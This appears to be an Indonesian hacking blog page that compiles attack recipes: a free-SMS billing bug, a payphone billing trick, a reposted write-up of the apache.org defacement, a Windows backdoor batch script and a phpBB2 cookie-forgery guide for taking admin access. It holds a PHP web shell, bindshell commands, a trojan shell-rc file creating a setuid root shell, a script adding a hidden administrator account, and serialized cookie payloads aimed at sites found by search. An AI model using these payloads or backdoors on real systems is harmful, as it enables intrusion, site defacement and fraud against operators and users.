CATATAN: Hati-hati dalam melakukan aksi ini karena sangat merugikan pihak lain. Jangan sekali-kali gunakan wartel tipe A untuk melakukan trik II telepon gratis keluar kotak karena akan kelihatan pada komputer billing operator dan pasti Anda akan dicurigai karena pulsa akan hilang begitu saja dari layar monitor operator Wartel. Jangan menggunakan trik ini kanare akan merugikan "pihak lain" =))

BUG SMS Satelindo

Teknologi SMS sekarang ini memang makin marak terlebih lagi dengan keadaan ekonomi yang Berantakan, solusi smslah yang lebih tepat dibanding menelpon yang sangat merobek kantong.

GSM yang menggunakan teknik switching dengan memanfaatkan system base station memungkinkan kita bisa mengirim pesan alphanumeric singkat dari sebuah Handphone ke handphone lain.

oke sampe disini preambule kita akhiri.

Kenapa dengan sms gratis yang dulu pernah populer sekarang telah susah ditemui?, itu pertanyaan yang sangat lazim terlontar dari pikiran kita semua yang mengandalkan sebuah promosi produk yang akhirnya menjadi komersil.

Bug yang saya dapatkan pada akhir bulan ini yaitu sebuah sms gratis dengan memanfaatkan kelemahan pada SATELINDO GSM. kenapa satelindo? nomor yang di keluarkan pihat SATELINDO yang baru dengan nomor seri depan 163***(misal +6281616378**) mempunyai bug yang dapat bermanfaat bagi kita untuk ber SMS gratis dengan sipengguna. Telah dicoba dari Simpati, mentari, proXL, dll tetap bisa dilakukan secara gratis.

cara sebagai berikut:

1. ketik SMS
2. kirim kenomor yang dituju ( misal: +6281616378** - tanpa bintang)
(yang saya dapatkan yaitu buug mentari versi 6163 <- diambil dari kode kartu dan nomor awal dari kartu mentari tersebut)
3. cara tulis nomor yang dituju menjadi 616378** (coba dgn nomor lain bila perlu)
4. tidak menggunakan karakter apapun yang ditambah pada nomor tujuan (karakter bintang hanya untuk menutupi nomor asli yang dituju.
4. dapat kita liat bahwa sms kita terkirim.
5. finish

Dari sana kita bisa lakukan dengan sepuas hati.

How To Deface APACHE

/*
* Before you start reading
*/
This paper does _not_ uncover any new vulnerabilities. It points out common
(and slightly less common) configuration errors, which even the people at
apache.org made. This is a general warning. Learn from it. Fix your systems,
so we won't have to :)

/*
* introduction
*/
This paper describes how, over the course of a week, we succeeded in
getting root access to the machine running www.apache.org, and changed
the main page to show a 'Powered by Microsoft BackOffice' logo instead
of the default 'Powered by Apache' logo (the feather). No other changes
were made, except to prevent other (possibly malicious) people getting in.

Note that the problems described in this paper are not apache-related,
these were all config errors (one of 'm straight from BugZilla's README,
but the README had enough warnings so I don't blame the BugZilla developers).
People running apache httpd do not need to start worrying because of
anything uncovered herein.

We hacked www.apache.org because there are a lot of servers running apache
software and if www.apache.org got compromised, somebody could backdoor
the apache server source and end up having lots of owned boxes.

We just couldn't allow this to happen, we secured the main ftproot==wwwroot
thing. While having owned root we just couldnt stand the urge to put that
small logo on it.

/*
* ftproot == wwwroot
* o+w dirs
*/
While searching for the laters apache httpserver to diff it the with
previous version and read that diff file for any options of new buffer
overflows, we got ourselves to ftp://ftp.apache.org. We found a mapping of
the http://www.apache.org on that ftp including world writable directories.

So we wrote a little wuh.php3 including
passthru($cmd);
?>

and uploaded that to one of the world writable directories.


/*
* Our commands executed
*/
Unsurprisingly, 'id' got executed when called like

http://www.apache.org/thatdir/wuh.php3?cmd=id

Next was to upload some bindshell and compile it like calling
http://www.apache.org/thatdir/wuh.php3?cmd=gcc+-o+httpd+httpd.c and then
executing it like calling http://www.apache.org/thatdir/wuh.php3?cmd=./httpd


/*
* The shell
*/
Ofcourse we used a bindshell that first requires ppl to authenticate with
a hardcoded password (:

Now we telnet to port 65533 where we binded that shell and we have local
nobody access, because cgi is running as user nobody.


/*
* The apache.org box
*/
What did we find on apache.org box:
-o=rx /root
-o=rx homedirs

apache.org is a freebsd 3.4 box. We didn't wanted to use any buffer
overflow or some lame exploit, goal was to reach root with only
configuration faults.


/*
* Mysql
*/
After a long search we found out that mysql was
running as user root and was reachable locally. Because apache.org was
running bugzilla which requires a mysql account and has it
username/password plaintext in the bugzilla source it was easy to
get a username/passwd for the mysql database.

We downloaded nportredird and have it set up to accept connections on
port 23306 from our ips and redir them to localhost port 3306 so we could
use our own mysql clients.


/*
* Full mysql access
* use it to create files
*/
Having gained access to port 3306 coming from localhost, using the login
'bugs' (which had full access [as in "all Y's"]), our privs where
elevated substantially. This was mostly due to sloppy reading of the BugZilla
README which _does_ show a quick way to set things up (with all Y's) but
also has lots of security warnings, including "don't run mysqld as root".

Using 'SELECT ... INTO OUTFILE;' we were now able to create files
anywhere, as root. These files were mode 666, and we could not overwrite
anything. Still, this seemed useful.

But what do you do with this ability? No use writing .rhosts files - no
sane rshd will accept a world-writable .rhosts file. Besides, rshd
wasn't running on this box.


/*
* our /root/.tcshrc
*/
Therefore, we decided to perform a trojan-like trick. We used database
'test' and created a one-column table with a 80char textfield. A couple
of inserts and one select later, we had ourselves a /root/.tcshrc with
contents similar to:
#!/bin/sh
cp /bin/sh /tmp/.rootsh
chmod 4755 /tmp/.rootsh
rm -f /root/.tcshrc


/*
* ROOT!!
*/
Quite trivial. Now the wait was for somebody to su -. Luckily, with 9
people legally having root, this didn't take long. The rest is trivial
too - being root the deface was quickly done, but not until after a
short report listing the vulnerabilities and quick fixes was build.
Shortly after the deface, we sent this report to one of the admins.


/*
* Fix that ftproot==wwwroot
*/
Another thing we did before the deface, was creating a file 'ftproot' in
the wwwroot (which was also ftproot), moving 'dist' to 'ftproot/dist'
and changing the ftproot to this new 'ftproot' dir, yielding the
world-writable dirs unexploitable but allowing ftp URLs to continue
working.


/*
* What could have been compromised?
*/
Remember the trojaned tcp_wrappers on ftp.win.tue.nl last year? If we
wanted to, we could have done the same thing to Apache. Edit the source
and have people download trojaned versions. Scary, eh?


/*
* In short:
*/
- ftproot==webroot, worldwritable dirs allowing us to upload and execute
php3 scripts
- mysqld running as root, with a FFULL RIGHTS login without a password.


/*
* Compliments for the Apache admin team
*/
We would like to compliment the Apache admin team on their swift
response when they found out about the deface, and also on their
approach, even calling us 'white hats' (we were at the most 'grey hats'
here, if you ask us).

Echo Backdoor

rem *echobackd00r.bat
rem *Maret 2004 - backd00r untuk XP && 2000
rem *dibuat untuk mempermudah menciptakan account admin
rem *Kombinasikan dengan SPLOITS untuk mendapatkan Account admin ex: kaht2
rem *atau masuk ke pc yang masih default dengan disket :P baca eksploits lokal


rem *MULAI.

@echo off
PROMPT $P$G
cls
Color 87
GOto iklan

:setting

rem *ganti USER dan PASS

set USER="backdoor"
set PASS="password"

if %USER%=="backdoor" Goto gagal else GOto proses

:proses

rem *masuk ke perintah tuk nambahin user + passwordnya

net user %USER% %PASS% /add
net localgroup Administrators %USER% /add
net localgroup Users %USER% /delete

cls
echo.
echo Account %USER% dengan password %PASS% telah berhasil di buat!
color 70


EXIT

:iklan

rem * just a banner from me :) , bisa di hilangkan :p

echo.
echo ###############################################################
echo # #
echo # Echobackd00r #
echo # created && tested by y3dips with XP OS #
echo # greetz to :the_day for idea, moby, z3r0byt3,comex, *PUJI #
echo # note: ubah USER dan PASS #
echo # #
echo ###############################################################
echo.
echo tekan ENTER !!!
pause>nul

Goto setting

:gagal

echo.
echo edit file echobackd00r.bat dan ubah USER dan PASSnya
echo.

Defacing

Langkah-Langkah Deface PHPBB/PHPBB2 Loser_cs_20
1. Download browser Mozilla FireFox

2. Download pluginnya yg bernama LiveHTTPHeader
download di http://livehttpheaders.mozdev.org/installation.html
cari yg paling baru

3. selanjutnya cari target dengan Uncle Google dgn syntax :
phpBB site:[terserah apa aja]

4. setelah itu buka plugin yg kita download tadi di Tools -> LiveHTTPHeader

5. Ingat, isi LiveHTTPHeader harus kosong

6. buka situs target, dengan begitu LiveHTTPHeader akan mengambil semua cookie yg tercatat di halaman target

7. setelah halaman sukses terbuka ditandai dengan tanda "done" di bawah browser, langkah selanjutnya adalah mengklik LiveHTTPHeader di bagian tengahnya dilanjutkan mengklik opsi Replay..

8. setelah LiveHTTPReplay terbuka liat bagian seperti dibawah ini pada LiveHTTPReplay...

Cookie: phpbb2mysql_data=a%3A0%3A%7B%7D; phpbb2mysql_sid=88da2bbdc1a3a789df094d50d91f7e3b

9. Hapus bagian yg belakang setelah tanda semi colon (

Cookie: phpbb2mysql_data=a%3A0%3A%7B%7D; phpbb2mysql_sid=88da2bbdc1a3a789df094d50d91f7e3b

\_______________hapus bagian ini_________________/

jadinya akan seperti ini :

Cookie: phpbb2mysql_data=a%3A0%3A%7B%7D

10. lalu klik replay lagi, sehingga halaman target akan mereload semua perintah cookie yg telah kita manipulasi

11. selanjutnya perhatikan langkah di bawah ini:

Cookie: phpbb2mysql_data=a%3A0%3A%7B%7D
\________hapus bagian ini dan di ganti dengan:

Cookie: phpbb2mysql_data=a:2{s:11:"autologinid";s:32:"602baahpepms74d4cb6f2d012e1e4019";s:6:"userid";s:1:"2";}

12. lalu klik replay lagi, sehingga halaman target akan mereload semua perintah cookie yg telah kita manipulasi tadi.

13. perhatikan lagi langkah ini:

Cookie: phpbb2mysql_data=a:2:{s:11:"autologinid";s:32:"602baahpepms74d4cb6f2d012e1e4019";s:6:"userid";s:1:"2";}
\___________________________bagian ini jg digantilagi_______________________________/

menjadi seperti ini:

Cookie: phpbb2mysql_data=a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D

14. lalu klik replay lagi, sehingga halaman target akan mereload semua perintah cookie yg telah kita manipulasi tadi.

15. selesai, silakan liat halaman target, kalo anda beruntung anda mendapatkan full admin.
Silakan pergi ke bawah halaman dan lihat opsi "Go To Administration Panel" telah muncul

Mengenai Saya

In Your Mind, In Your Mind, Indonesia
Tidak gampang ngaku hacker!!!!